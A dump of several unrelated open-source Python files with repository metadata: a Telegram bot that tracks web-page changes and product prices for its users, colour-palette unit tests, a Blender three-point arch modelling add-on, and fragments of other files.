return np.exp(-0.5 * (r /sigma)**2) / (np.sqrt(2*np.pi)*sigma)
def addScores(self, scores, t):
for label, score in scores:
if label not in self.accumulator:
self.accumulator[label] = np.zeros((self.max_size+2*self.width))
self.accumulator[label][t:t+2*self.width+1] += score * self.kernel
def getAccumulator(self):
return list(self.accumulator.iteritems())
def getBestLabels(self, tmin=0, tmax=-1):
if tmax == -1:
tmax = self.max_size
if len(self.accumulator) == 0:
return []
l = list(self.accumulator.iteritems())
best_labels = []
for t in range(tmax):
label, _ = sorted(l, key=lambda x: x[1][t+self.width], reverse=True)[0]
best_labels.append(label)
best_labels2 = []
for label in set(best_labels):
if best_labels.count(label) >= 8:
best_labels2.append(label)
return sorted(best_labels2)
def getLabelsScores(self, labels, tmin=0, tmax=-1):
if tmax == -1:
tmax = self.max_size
return [self.accumulator[label][self.width+tmin:self.width+tmax] for label in labels]
| ina-foss/ID-Fits | lib/scores_accumulator.py | scores_accumulator.py | py | 2,297 | python | en | code | 7 | github-code | 50 |
2936876007 | from time import sleep
from threading import Thread
from unicodedata import numeric
import requests
import uuid
from threading import Barrier
import creds
import webbrowser
import telebot
from telebot import types
from telebot.types import InlineKeyboardButton, InlineKeyboardMarkup
import os
import re
import urllib
from bs4 import BeautifulSoup
import pyrebase
import firebase_admin
from firebase_admin import credentials
from firebase_admin import firestore
from firebase_admin import storage
import yagmail
import smtplib
from email.mime.text import MIMEText
from datetime import date
NOTIFICA_EMAIL = True
SENDING_EMAIL_USERNAME = creds.SENDING_EMAIL_USERNAME
SENDING_EMAIL_PASSWORD = creds.SENDING_EMAIL_PASSWORD
TIMEOUT = 300
debug = False
cred = credentials.Certificate(creds.PATH)
firebase_admin.initialize_app(cred)
db = firestore.client()
API_KEY = creds.API_KEY
firebase = pyrebase.initialize_app(creds.firebaseConfig)
auth = firebase.auth()
storage = firebase.storage()
storagePath = "Soups/"
bot = telebot.TeleBot(API_KEY)
HEADERS = ({'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36',
'Content-Type': 'application/json',
})
def get_soup(url):
response = requests.get(url, headers=HEADERS)
if response.ok:
soup = BeautifulSoup(response.content, 'html.parser')
soup.prettify()
return soup
else:
print(response.status_code)
def get_html(url):
response = requests.get(url, headers=HEADERS)
if response.ok:
soup = BeautifulSoup(response.content, 'html.parser')
soup.prettify()
for s in soup.select('script'):
s.extract()
for m in soup.select('meta'):
m.extract()
soupString = str(soup).replace('\r','')
soupString = re.sub(r"nonce=\"[-a-zA-Z0-9@:%._\+~#=]+?\"",'', soupString )
soupString = re.sub(r"=\"https:\/\/lh\d\.googleusercontent\.com\/.+?\"",'', soupString )
soupString = re.sub(r"=\"https:\/\/www\.gstatic.+?\"",'', soupString )
return soupString
else:
print(response.status_code)
def urlCheck(message):
# pattern1 = r"https?:\/\/(www\.)?[-a-zA-Z0-9@:%._\+~#=]{1,256}\.\w+\/?"
# pattern2 = r"[-a-zA-Z0-9]{1,256}\.[a-zA-Z0-9()]{1,6}"
# if re.match(pattern1, message.text) or re.match(pattern2, message.text):
try:
if message.entities[0].type == "url" or message.entities[1].type == "url" or message.entities[2].type == "url":
return True
except:
return False
def nomeEsistente(nome, utente):
nomi = db.collection('Utente-Sito').where("utente", "==", utente).where("nome", "==", nome).get()
if len(nomi)>0:
return True
return False
def truncate_url(url):
pattern = r"https?:\/\/(www\.)?([-a-zA-Z0-9@:%._\+~#=]{1,256}\.\w+)\/?"
t = re.search(pattern, url).group(2)
return t
def uploadHtml(url, nomeCustom):
if urlCheck(url):
# try:
urlSito = url.text
utente = url.chat.id
html = get_html(urlSito)
#troncato = truncate_url(urlSito)
s = db.collection('Sito').where("url", "==", urlSito).get()
if len(s) == 0: #Se il sito non era già presente
nomeFile = uuid.uuid4().hex
fh = open(nomeFile, "w", encoding="utf-8")
fh.write(html)
fh.close()
storage.child(storagePath + nomeFile).put(nomeFile)
today = date.today()
data = str(today.strftime("%d/%m/%y"))
db.collection('Sito').add({'url': urlSito, 'storageid': nomeFile, 'data':data})
try:
os.unlink(nomeFile)
except Exception as e:
print(e)
us = db.collection('Utente-Sito').where("utente", "==", utente).where("sito", "==", urlSito).get()
if len(us)==0: # Se il sito non era già stato registrato dall'utente
db.collection('Utente-Sito').add({'utente':utente, 'sito':urlSito, 'nome': nomeCustom.text})
return True
return False
# except Exception as e:
# bot.reply_to(message, str(e))
def prezzoAbbassato(prodotto, obiettivo):
nuovoPrezzo = getProductprice(prodotto)
prodObj = db.collection('Prodotto').where('id', '==', prodotto).get()[0]
oldPrezzo = prodObj.get('prezzo')
if nuovoPrezzo < obiettivo and nuovoPrezzo < oldPrezzo:
key = prodObj.id
db.collection('Prodotto').document(key).update({'prezzo':nuovoPrezzo})
return nuovoPrezzo
return -1
def paginaCambiata(url, storageId):
newSoup = get_html(url)
storage.child(storagePath + storageId).download("", storageId)
fh=open(storageId, 'r', encoding="utf-8")
oldSoup = fh.read()
fh.close()
if newSoup == oldSoup:
try:
os.unlink(storageId)
except Exception as e:
print(e)
return False
else:
fh = open("Vecchiosito", "w", encoding='utf-8')
fh.write(oldSoup)
fh.close()
fh2 = open("Nuovosito", "w", encoding='utf-8')
fh2.write(newSoup)
fh2.close()
today = date.today()
data = str(today.strftime("%d/%m/%y"))
key = db.collection('Sito').where('url', '==', url).get()[0].id
db.collection('Sito').document(key).update({'data': data})
handler = open(storageId, 'w', encoding='utf-8')
handler.write(newSoup)
handler.close()
storage.child(storagePath + storageId).put(storageId)
try:
os.unlink(storageId)
except Exception as e:
print(e)
return True
def avvisaUtenteSito(utente, url, nomeSito):
bot.send_message(utente, f"Il sito memorizzato come '{nomeSito}' ha subito dei cambiamenti: \n" + url)
dbUser = db.collection('Utente').where('nome', '==', utente).get()[0]
mailAddress = dbUser.get('email')
oggetto = "Cambiamento pagine"
contenuto = f"Il sito memorizzato come '{nomeSito}' ha subito dei cambiamenti: \n" + url
if NOTIFICA_EMAIL and mailAddress!="":
inviaEmail(mailAddress,oggetto, contenuto)
def avvisaUtenteProdotto(user, prodotto, nomeProd, nuovoPrezzo):
pattern = "(\d+)\.(\d+)"
euro = str(re.search(pattern,str(nuovoPrezzo)).group(1))
centesimi = str(re.search(pattern,str(nuovoPrezzo)).group(2))
if centesimi == "0":
nuovoPrezzo = euro + ",00"
else:
nuovoPrezzo = f"{euro},{centesimi}"
oggetto = "Abbassamento di prezzo"
contenuto = f"Il prezzo del prodotto da te memorizzato come '{nomeProd}' si è abbassato a {nuovoPrezzo}€ \n" + prodotto
bot.send_message(user, contenuto)
dbUser = db.collection('Utente').where('nome', '==', user).get()[0]
mailAddress = dbUser.get('email')
if NOTIFICA_EMAIL and mailAddress!="":
inviaEmail(mailAddress, oggetto, contenuto)
def checkAutomaticoSito():
utenteSito = db.collection('Utente-Sito').get()
sitiCambiati = []
for sito in utenteSito:
urlSito = sito.get('sito')
s = db.collection('Sito').where('url',"==",urlSito).get()
storageid = s[0].get('storageid')
if paginaCambiata(urlSito, storageid):
sitiCambiati.append(urlSito)
for utente in utenteSito:
urlSalvato = utente.get('sito')
user = utente.get('utente')
nomeSito = utente.get('nome')
if urlSalvato in sitiCambiati:
avvisaUtenteSito(user, urlSalvato, nomeSito)
def checkAutomaticoProdotto():
utenteProdotto = db.collection('Utente-Prodotto').where('utente', "!=", "").get()
prodottiAbbassati = {}
for prodotto in utenteProdotto:
urlProdotto = prodotto.get('prodotto')
obiettivo = prodotto.get('obiettivo')
nuovoPrezzo = prezzoAbbassato(urlProdotto, obiettivo)
if nuovoPrezzo != -1:
prodottiAbbassati[urlProdotto] = nuovoPrezzo
for utente in utenteProdotto:
prodotto = utente.get('prodotto')
user = utente.get('utente')
nomeProd = utente.get('nome')
if prodotto in prodottiAbbassati:
nuovoPrezzo = prodottiAbbassati[prodotto]
avvisaUtenteProdotto(user, prodotto, nomeProd, nuovoPrezzo)
def inviaEmail(destinatario, oggetto, contenuto):
yagmail.SMTP(SENDING_EMAIL_USERNAME, SENDING_EMAIL_PASSWORD).send(destinatario, oggetto, contenuto)
def priceConverter(strPrice):
pricePattern="(\d+((\.|\,)\d+)?)"
try:
numeric_price = re.search(pricePattern, strPrice).group(1).replace(".", "")
numeric_price = numeric_price.replace(",", ".")
except:
numeric_price = re.search(pricePattern, strPrice).group(1)
numeric_price = float(numeric_price)
return numeric_price
def productListKeyboard(message):
dict = {}
docs = db.collection("Utente-Prodotto").where("utente", "==", message.chat.id).get()
keyboard = []
for doc in docs:
Prodotto = db.collection('Prodotto').where('id','==', doc.get('prodotto')).get()[0]
pattern = "(\d+)\.(\d+)"
prezzo = str(Prodotto.get('prezzo'))
euro = str(re.search(pattern,prezzo).group(1))
centesimi = str(re.search(pattern,prezzo).group(2))
if centesimi == "0":
prezzo = euro + ",00"
else:
prezzo = f"{euro},{centesimi}"
if doc.get('prodotto') not in dict: #unique
dict[doc.get('prodotto')] = f"{doc.get('nome')} ({prezzo}€)"
if len(dict) > 0:
for k in dict.keys():
tempButton = InlineKeyboardButton(text = dict[k], url = k)
keyboard.append([tempButton])
return keyboard
def websitesListKeyboard(message):
dict = {}
docs = db.collection("Utente-Sito").where("utente", "==", message.chat.id).get()
keyboard = []
for doc in docs:
if doc.get('sito') not in dict: #unique
docData = db.collection('Sito').where('url', '==', doc.get('sito')).get()[0]
data = docData.get('data')
dict[doc.get('sito')] =f"{doc.get('nome')} - [{data}]"
if len(dict) > 0:
for k in dict.keys():
tempButton = InlineKeyboardButton(text = dict[k], url = k)
keyboard.append([tempButton])
return keyboard
def getProductprice(urlProd):
soup = get_soup(urlProd)
price = "prezzo non trovato"
patternAmazon = "amazon\.\w+\/.+"
patternAmazon2 = "https?:\/\/amzn\.\w+/.+"
patternSubito = "subito\.it\/\w+"
patternZalando = "zalando\.it/\w+"
patternEprice = "eprice\.it/\w+"
if re.search(patternAmazon, str(urlProd)) or re.search(patternAmazon2, str(urlProd)):
price = soup.find('span', class_="a-offscreen").get_text()
elif re.search(patternSubito, str(urlProd)):
price = soup.find('p', class_="index-module_price__N7M2x AdInfo_ad-info__price__tGg9h index-module_large__SUacX").get_text()
elif re.search(patternZalando, str(urlProd)):
price = soup.find('p', class_="RYghuO uqkIZw ka2E9k uMhVZi FxZV-M pVrzNP").get_text()
elif re.search(patternEprice, str(urlProd)):
price = soup.find('ins', class_="itemPrice").get_text()
else:
raise Exception("Prezzo non trovato")
numeric_price = priceConverter(price)
return numeric_price
class pageCheckThread(Thread):
def __init__(self):
super().__init__()
def run(self):
while True:
checkAutomaticoSito()
sleep(TIMEOUT)
class productCheckThread(Thread):
def __init__(self):
super().__init__()
def run(self):
while True:
checkAutomaticoProdotto()
sleep(TIMEOUT)
| lorenzopiro/GeronimoBot | functions.py | functions.py | py | 11,817 | python | it | code | 1 | github-code | 50 |
4591513762 | from colour_palette.colour import Colour
def test_complementary_colour():
black = Colour(0, 0, 0)
white = Colour(255, 255, 255)
complementary_to_black = black.complementary_colour()
complementary_to_white = white.complementary_colour()
assert black == complementary_to_white
assert white == complementary_to_black
red = Colour(255, 0, 0)
cyan = Colour(0, 255, 255)
complementary_to_red = red.complementary_colour()
assert cyan == complementary_to_red
green = Colour(0, 255, 0)
magenta = Colour(255, 0, 255)
complementary_to_green = green.complementary_colour()
assert magenta == complementary_to_green
blue = Colour(0, 0, 255)
yellow = Colour(255, 255, 0)
complementary_to_blue = blue.complementary_colour()
assert yellow == complementary_to_blue
def test_triadic_colours():
red = Colour(255, 0, 0)
blue = Colour(0, 0, 255)
green = Colour(0, 255, 0)
red_triadic_colours = red.triadic_colours()
assert red in red_triadic_colours
assert blue in red_triadic_colours
assert green in red_triadic_colours
test_colour = Colour(49, 206, 143)
test_colour_triadic_colours = test_colour.triadic_colours()
expected_result_1 = Colour(206, 143, 49)
expected_result_2 = Colour(143, 49, 206)
assert test_colour in test_colour_triadic_colours
assert expected_result_1 in test_colour_triadic_colours
assert expected_result_2 in test_colour_triadic_colours
def test_analogous_colours():
test_colour = Colour(33, 66, 222)
expected_result_1 = Colour(94, 33, 222)
# Ever so slightly different to some other calculators out there
# assuming that this is using a differnt number of degrees of rotation
expected_result_2 = Colour(33, 160, 222)
analogous_colours = test_colour.analogous_colours()
assert test_colour in analogous_colours
assert expected_result_1 in analogous_colours
assert expected_result_2 in analogous_colours
def test_split_complementary_colours():
test_colour = Colour(0, 0, 255)
expected_result_1 = Colour(255, 128, 0)
expected_result_2 = Colour(128, 255, 0)
test_split_complementary_colours = test_colour.split_complementary()
assert len(test_split_complementary_colours) == 3
assert test_colour in test_split_complementary_colours
assert expected_result_1 in test_split_complementary_colours
assert expected_result_2 in test_split_complementary_colours
def test_rgb_to_hex():
black = Colour(0, 0, 0)
assert black.hex() == '#000000'
white = Colour(255, 255, 255)
assert white.hex().lower() == '#FFFFFF'.lower()
red = Colour(255, 0, 0)
assert red.hex().lower() == '#FF0000'.lower()
blue = Colour(0, 255, 0)
assert blue.hex().lower() == '#00FF00'.lower()
green = Colour(0, 0, 255)
assert green.hex().lower() == '#0000FF'.lower()
silver = Colour(192, 192, 192)
assert silver.hex().lower() == '#C0C0C0'.lower()
| anishpatelwork/colour-palette-calculator | tests/test_colour.py | test_colour.py | py | 2,961 | python | en | code | 0 | github-code | 50 |
24005442897 | '''
BEGIN GPL LICENSE BLOCK
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software Foundation,
Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
END GPL LICENSE BLOCK
#============================================================================
tp_arch_tool_v000.py (Three Point Arch Tool)
Install instructions:
1) Save the tp_arch_tool_v000.py file to your computer.
2) In Blender, go to File > User Preferences > Add-ons
3) Press Install From File and select the tp_arch_tool_v000.py file you
just downloaded.
4) Enable the Add-On by clicking on the box to the left of Add-On's name
#============================================================================
Stage 0 = Add-on just launched, no points placed
Stage 1 = 1st point placed
Stage 2 = 2nd point placed (1st to 2nd point is arc width)
Stage 3 = 3rd point placed (to create planar surface to align arc to)
Stage 4 = 1st arch edge created
Stage 5 = Make faces from 1st arch (with extrude > scale)
Stage 6 = Make arch faces into solid (by extruding faces from Stage 5)
Stage 7 = Exit add-on
Extras
* Option to change edges on arch (pause with space to break modal?)
* Option to manually set distance between arch edges (spacebar pause menu?)
* Option to "roll back" arch distance?
* Option to add "base/support wall" before creating arch?
* Option to change arch types (circular, equilateral, parabolic, etc)
* Use curves instead of vertex plotting?
'''
bl_info = {
"name": "Three Point Arch Tool",
"author": "nBurn",
"version": (0, 0, 0),
"blender": (2, 7, 7),
"location": "View3D",
"description": "Tool for creating arches",
"category": "Mesh"
}
import bpy
import bmesh
import bgl
import blf
from copy import deepcopy
from math import pi, sqrt, degrees, radians, sin, cos
from mathutils import geometry, Euler, Quaternion, Vector
from mathutils.geometry import intersect_line_line_2d
from bpy_extras import view3d_utils
#from bpy_extras.view3d_utils import location_3d_to_region_2d
from bpy_extras.view3d_utils import location_3d_to_region_2d as loc_3d_to_2d
#print("\n\n Loaded: Arc Tool\n") # debug
(
X,
Y,
Z,
XO_SLOW3DTO2D,
XO_GRABONLY,
) = range(5)
reg_rv3d = ()
pt_store = ()
def getreg_rv3d():
global reg_rv3d
region = bpy.context.region
rv3d = bpy.context.region_data
reg_rv3d = (region, rv3d)
class Colr:
red = 1.0, 0.0, 0.0, 0.5
green = 0.0, 1.0, 0.0, 0.5
blue = 0.0, 0.0, 1.0, 0.5
white = 1.0, 1.0, 1.0, 1.0
grey = 1.0, 1.0, 1.0, 0.4
class RotationData:
def __init__( self, ax=None, piv_norm=() ):
self.axis_lk = ax
self.piv_norm = piv_norm
def backup_snap_settings():
backup = [
deepcopy(bpy.context.tool_settings.use_snap),
deepcopy(bpy.context.tool_settings.snap_element),
deepcopy(bpy.context.tool_settings.snap_target)]
return backup
def restore_snap_settings(backup):
bpy.context.tool_settings.use_snap = deepcopy(backup[0])
bpy.context.tool_settings.snap_element = deepcopy(backup[1])
bpy.context.tool_settings.snap_target = deepcopy(backup[2])
return
def get_rotated_pt(piv_co, mov_co, ang_diff_rad, rot_dat):
axis_lk = ''
#axis_lk = rot_dat.axis_lk
mov_aligned = mov_co - piv_co
rot_val = []
if axis_lk == '': # arbitrary axis / spherical rotations
rot_val = Quaternion(rot_dat.piv_norm, ang_diff_rad)
elif axis_lk == 'X':
rot_val = Euler((ang_diff_rad, 0.0, 0.0), 'XYZ')
elif axis_lk == 'Y':
rot_val = Euler((0.0, ang_diff_rad, 0.0), 'XYZ')
elif axis_lk == 'Z':
rot_val = Euler((0.0, 0.0, ang_diff_rad), 'XYZ')
mov_aligned.rotate(rot_val)
return mov_aligned + piv_co
def draw_pt_2D(pt_co, pt_color):
bgl.glEnable(bgl.GL_BLEND)
bgl.glPointSize(10)
bgl.glColor4f(*pt_color)
bgl.glBegin(bgl.GL_POINTS)
bgl.glVertex2f(*pt_co)
bgl.glEnd()
return
def draw_line_2D(pt_co_1, pt_co_2, pt_color):
bgl.glEnable(bgl.GL_BLEND)
bgl.glPointSize(7)
bgl.glColor4f(*pt_color)
bgl.glBegin(bgl.GL_LINE_STRIP)
bgl.glVertex2f(*pt_co_1)
bgl.glVertex2f(*pt_co_2)
bgl.glEnd()
return
def draw_circ_seg_3D(steps, pts, orig, ang_meas, rot_dat, pt_color):
global reg_rv3d
orig2d = loc_3d_to_2d(reg_rv3d[0], reg_rv3d[1], orig)
# todo figure out why above sometimes returns None in Perspective mode...
# returns None when 3d point is not inside active 3D View
if orig2d is not None:
draw_pt_2D(orig2d, Colr.white)
rad_incr = abs(ang_meas / steps)
bgl.glColor4f(*pt_color)
bgl.glBegin(bgl.GL_LINE_STRIP)
curr_ang = 0.0
while curr_ang <= ang_meas:
new_pt = get_rotated_pt(orig, pts[0], curr_ang, rot_dat)
new_pt2d = loc_3d_to_2d(reg_rv3d[0], reg_rv3d[1], new_pt)
if new_pt2d is not None:
bgl.glVertex2f(new_pt2d[X], new_pt2d[Y])
curr_ang = curr_ang + rad_incr
new_pt2d = loc_3d_to_2d(reg_rv3d[0], reg_rv3d[1], pts[1])
if new_pt2d is not None:
bgl.glVertex2f(new_pt2d[X], new_pt2d[Y])
bgl.glEnd()
return
# Refreshes mesh drawing in 3D view and updates mesh coordinate
# data so ref_pts are drawn at correct locations.
# Using editmode_toggle to do this seems hackish, but editmode_toggle seems
# to be the only thing that updates both drawing and coordinate info.
def editmode_refresh(ed_type):
if ed_type == "EDIT_MESH":
bpy.ops.object.editmode_toggle()
bpy.ops.object.editmode_toggle()
# === PointFind code ===
def create_snap_pt(msLoc, EdType):
global reg_rv3d, pt_store
#sel_backup.update(EdType)
region, rv3d = reg_rv3d[0], reg_rv3d[1]
v_u = view3d_utils # shorthand
perspMdFix = v_u.region_2d_to_vector_3d(region, rv3d, msLoc) / 5
enterloc = v_u.region_2d_to_origin_3d(region, rv3d, msLoc) + perspMdFix
if EdType == 'OBJECT':
bpy.ops.object.add(type = 'MESH', location = enterloc)
pt_store = bpy.context.object
# todo : move below to backup_snap_settings ?
bpy.context.tool_settings.use_snap = False
bpy.context.tool_settings.snap_element = 'VERTEX'
#bpy.context.tool_settings.snap_target = 'ACTIVE'
bpy.ops.transform.translate('INVOKE_DEFAULT')
# Makes sure only the "guide point" object or vert
# added with create_snap_pt is grabbed.
def grab_snap_pt(ms_loc, ed_type, sel_backup):
global reg_rv3d, pt_store
#sel_backup.update(ed_type)
region, rv3d = reg_rv3d[0], reg_rv3d[1]
v_u = view3d_utils # shorthand
persp_md_fix = v_u.region_2d_to_vector_3d(region, rv3d, ms_loc) / 5
enterloc = v_u.region_2d_to_origin_3d(region, rv3d, ms_loc) + persp_md_fix
#if ed_type == 'OBJECT':
bpy.ops.object.select_all(action='DESELECT')
bpy.context.scene.objects[0].select = True
# #bpy.context.scene.objects[0].location = enterloc
'''
elif ed_type == 'EDIT_MESH':
bpy.ops.mesh.select_all(action='DESELECT')
bm = bmesh.from_edit_mesh(bpy.context.edit_object.data)
bm.verts[-1].select = True
inver_mw = bpy.context.edit_object.matrix_world.inverted()
local_co = inver_mw * enterloc
#bm.verts[-1].co = local_co
editmode_refresh(ed_type)
'''
bpy.ops.transform.translate('INVOKE_DEFAULT')
# Makes sure only the "guide point" object or vert
# added with create_snap_pt is deleted.
def remove_snap_pt(ed_type, sel_backup):
if ed_type == 'OBJECT':
bpy.ops.object.select_all(action='DESELECT')
bpy.context.scene.objects[0].select = True
bpy.ops.object.delete()
elif ed_type == 'EDIT_MESH':
bpy.ops.mesh.select_all(action='DESELECT')
bm = bmesh.from_edit_mesh(bpy.context.edit_object.data)
bm.verts[-1].select = True
editmode_refresh(ed_type)
bpy.ops.mesh.delete(type='VERT')
#sel_backup.restore_selected(ed_type)
#print("removsadf")
def step_decrm(self):
if self.step_cnt > 2:
self.step_cnt -= 1
def exit_addon(self):
if self.pt_cnt < 5:
remove_snap_pt(self.curr_ed_type, self.sel_backup)
'''
#if self.pt_find_md == XO_GRABONLY:
remove_snap_pt(self.curr_ed_type, self.sel_backup)
self.pt_find_md = XO_SLOW3DTO2D
if self.curr_ed_type == 'EDIT_MESH':
for i in self.sel_backup.sel_msh_objs:
self.sel_backup.obj[i].select = True
for i in self.sel_backup.sel_nm_objs:
self.sel_backup.obj[i].select = True
'''
if self.curr_ed_type == 'EDIT_MESH':
bpy.ops.object.editmode_toggle()
restore_snap_settings(self.settings_backup)
#print("\n\n\n Add-On Exited!\n") # debug
def draw_callback_px(self, context):
getreg_rv3d()
stp_cnt = self.step_cnt
global pt_store, reg_rv3d
if self.left_click:
self.left_click = False
t_loc = None
if self.pt_cnt < 3:
t_loc = pt_store.location.copy()
if t_loc != None:
dup = False
for i in self.pts:
if t_loc == i:
dup = True
if dup == False:
self.pts.append( t_loc.copy() )
self.pt_cnt += 1
if self.pt_cnt < 2:
bpy.ops.transform.translate('INVOKE_DEFAULT')
elif self.pt_cnt == 2:
# move snap point to arch center before turning grab mode back on
bpy.context.scene.objects[0].location = self.pts[0].lerp(self.pts[1], 0.5)
bpy.ops.transform.translate('INVOKE_DEFAULT')
elif self.pt_cnt == 3 and self.buff != None:
self.pt_cnt += 1
bpy.context.scene.objects[0].location = self.buff[2].copy()
#if self.curr_ed_type != 'EDIT_MESH':
# bpy.ops.object.editmode_toggle()
bpy.ops.object.editmode_toggle()
inv_mw = bpy.context.scene.objects[0].matrix_world.inverted()
piv_cent = inv_mw * self.buff[2]
bm = bmesh.from_edit_mesh(bpy.context.edit_object.data)
bm.verts.new( inv_mw * self.buff[1][0] )
# Spin and deal with geometry on side 'a'
edges_start_a = bm.edges[:]
geom_start_a = bm.verts[:] + edges_start_a
ret = bmesh.ops.spin(
bm,
geom=geom_start_a,
angle=self.buff[3],
steps=stp_cnt,
axis=self.rdat.piv_norm,
cent=piv_cent)
edges_end_a = [ele for ele in ret["geom_last"]
if isinstance(ele, bmesh.types.BMEdge)]
del ret
bpy.context.scene.cursor_location = self.buff[2].copy()
bpy.context.tool_settings.snap_target = 'ACTIVE'
bpy.context.space_data.pivot_point = 'CURSOR'
bpy.context.space_data.transform_orientation = 'GLOBAL'
bpy.ops.mesh.select_all(action='SELECT')
bpy.ops.mesh.extrude_region_move()
bpy.ops.transform.resize('INVOKE_DEFAULT', constraint_orientation = 'GLOBAL')
elif self.pt_cnt == 4:
self.pt_cnt += 1
if self.buff != None:
bpy.ops.mesh.select_all(action='SELECT')
bpy.ops.view3d.edit_mesh_extrude_move_normal('INVOKE_DEFAULT')
self.exitCheck = True
#print("self.pt_cnt", self.pt_cnt) # debug
# Draw UI: setup 2d data for drawing on screen
pts2d, pts_str2d = [], []
if self.pt_cnt > 0:
pts2d = [loc_3d_to_2d(reg_rv3d[0], reg_rv3d[1], i) for i in self.pts]
pts_str2d = loc_3d_to_2d(reg_rv3d[0], reg_rv3d[1], pt_store.location)
if self.pt_cnt == 1:
draw_line_2D(pts2d[0], pts_str2d, Colr.white)
elif self.pt_cnt == 2:
cent = self.pts[0].lerp(self.pts[1], 0.5)
self.rdat.piv_norm = geometry.normal(self.pts[0], cent, pt_store.location)
pivNorm = self.rdat.piv_norm.copy()
movAligned = self.pts[0] - cent
rot_pos, rot_neg = movAligned.copy(), movAligned.copy()
hgt = (pt_store.location - cent).length
wid = (self.pts[0] - self.pts[1]).length
rad = None
if hgt != 0:
rad = (hgt / 2) + (wid * wid) / (8 * hgt)
else:
rad = 0
cen_to_piv = rad - hgt
# find points perp to starting two
rot_pos.rotate( Quaternion(pivNorm, radians(90)) )
rot_neg.rotate( Quaternion(pivNorm,-radians(90)) )
rot_pos = rot_pos + cent
rot_neg = rot_neg + cent
old_dis = wid / 2
scale = cen_to_piv / old_dis
circ_cen_p = cent.lerp(rot_pos, scale)
circ_cen_n = cent.lerp(rot_neg, scale)
# workaround to avoid division by zero
algnAco = self.pts[0] - circ_cen_p
algnCco = self.pts[1] - circ_cen_p
ang_meas = algnAco.angle(algnCco)
if ang_meas == 0.0:
self.buff = None
draw_line_2D(pts2d[0], pts2d[1], Colr.white)
return
if rad > wid/2 and hgt > rad:
ang_meas = 2 * pi - ang_meas
rot_pos_2d = loc_3d_to_2d(reg_rv3d[0], reg_rv3d[1], rot_pos)
rot_neg_2d = loc_3d_to_2d(reg_rv3d[0], reg_rv3d[1], rot_neg)
msToPtP_dis = (rot_pos_2d - pts_str2d).length
msToPtN_dis = (rot_neg_2d - pts_str2d).length
if msToPtP_dis > msToPtN_dis: # closer to negative
new_pts = self.pts[1], self.pts[0]
draw_circ_seg_3D(stp_cnt, new_pts, circ_cen_p, ang_meas, self.rdat, Colr.green)
self.buff = 'neg', new_pts, circ_cen_p, ang_meas
elif msToPtP_dis < msToPtN_dis: # closer to positive
draw_circ_seg_3D(stp_cnt, self.pts, circ_cen_n, ang_meas, self.rdat, Colr.green)
self.buff = 'pos', self.pts, circ_cen_n, ang_meas
elif self.pt_cnt == 3:
if self.buff == None:
pts2d = [loc_3d_to_2d(reg_rv3d[0], reg_rv3d[1], i) for i in self.pts]
draw_line_2D(pts2d[0], pts2d[1], Colr.white)
else:
draw_circ_seg_3D(stp_cnt, self.buff[1], self.buff[2], self.buff[3], self.rdat, Colr.green)
for i in pts2d:
draw_pt_2D(i, Colr.white)
class ModalArchTool(bpy.types.Operator):
'''Draw a line with the mouse'''
bl_idname = "view3d.modal_arch_tool"
bl_label = "Three Point Arch Tool"
# Only launch Add-On from OBJECT or EDIT modes
@classmethod
def poll(self, context):
return context.mode == 'OBJECT' or context.mode == 'EDIT_MESH'
def modal(self, context, event):
context.area.tag_redraw()
self.curr_ed_type = context.mode
if event.type in {'MIDDLEMOUSE', 'NUMPAD_1', 'NUMPAD_2', 'NUMPAD_3',
'NUMPAD_4', 'NUMPAD_6', 'NUMPAD_7', 'NUMPAD_8', 'NUMPAD_9', 'NUMPAD_5'}:
return {'PASS_THROUGH'}
if event.type == 'MOUSEMOVE':
self.mouse_loc = Vector((event.mouse_region_x, event.mouse_region_y))
if event.type == 'LEFTMOUSE' and event.value == 'RELEASE':
self.left_click = True
self.left_click_loc = Vector((event.mouse_region_x, event.mouse_region_y))
if event.type == 'SPACE' and event.value == 'RELEASE':
self.left_click = True
self.left_click_loc = Vector((event.mouse_region_x, event.mouse_region_y))
if self.pt_cnt == 3:
if event.type == 'WHEELUPMOUSE':
self.step_cnt += 1
if event.type == 'WHEELDOWNMOUSE':
step_decrm(self)
if event.type == 'UP_ARROW' and event.value == 'RELEASE':
self.step_cnt += 1
if event.type == 'DOWN_ARROW' and event.value == 'RELEASE':
step_decrm(self)
#if event.type == 'D' and event.value == 'RELEASE':
# # call debugger
# __import__('code').interact(local=dict(globals(), **locals()))
if event.type in {'ESC', 'RIGHTMOUSE'}:
bpy.types.SpaceView3D.draw_handler_remove(self._handle, 'WINDOW')
exit_addon(self)
return {'CANCELLED'}
if self.exitCheck:
bpy.types.SpaceView3D.draw_handler_remove(self._handle, 'WINDOW')
exit_addon(self)
return {'FINISHED'}
return {'RUNNING_MODAL'}
def invoke(self, context, event):
if context.area.type == 'VIEW_3D':
args = (self, context)
# Add the region OpenGL drawing callback
# draw in view space with 'POST_VIEW' and 'PRE_VIEW'
self._handle = bpy.types.SpaceView3D.draw_handler_add(draw_callback_px,
args, 'WINDOW', 'POST_PIXEL')
if context.mode == 'EDIT_MESH':
bpy.ops.object.editmode_toggle()
bpy.ops.object.select_all(action='DESELECT')
self.curr_ed_type = context.mode # current Blender Editor Type
self.mouse_loc = Vector((event.mouse_region_x, event.mouse_region_y))
self.left_click_loc = []
self.left_click = False
self.rdat = RotationData('')
self.step_cnt = 8
self.pt_cnt = 0
self.pts = []
self.buff = None
self.settings_backup = backup_snap_settings()
self.sel_backup = None # place holder
self.exitCheck = False
context.window_manager.modal_handler_add(self)
getreg_rv3d()
create_snap_pt(self.mouse_loc, self.curr_ed_type)
#print("Add-on started!")
return {'RUNNING_MODAL'}
else:
self.report({'WARNING'}, "View3D not found, cannot run operator")
return {'CANCELLED'}
def register():
bpy.utils.register_class(ModalArchTool)
def unregister():
bpy.utils.unregister_class(ModalArchTool)
if __name__ == "__main__":
register()
| JT-a/blenderpython279 | scripts/addons_extern/tp_arch_tool_v000.py | tp_arch_tool_v000.py | py | 18,451 | python | en | code | 5 | github-code | 50 |
45730463859 | from __future__ import division, print_function
from sklearn import preprocessing
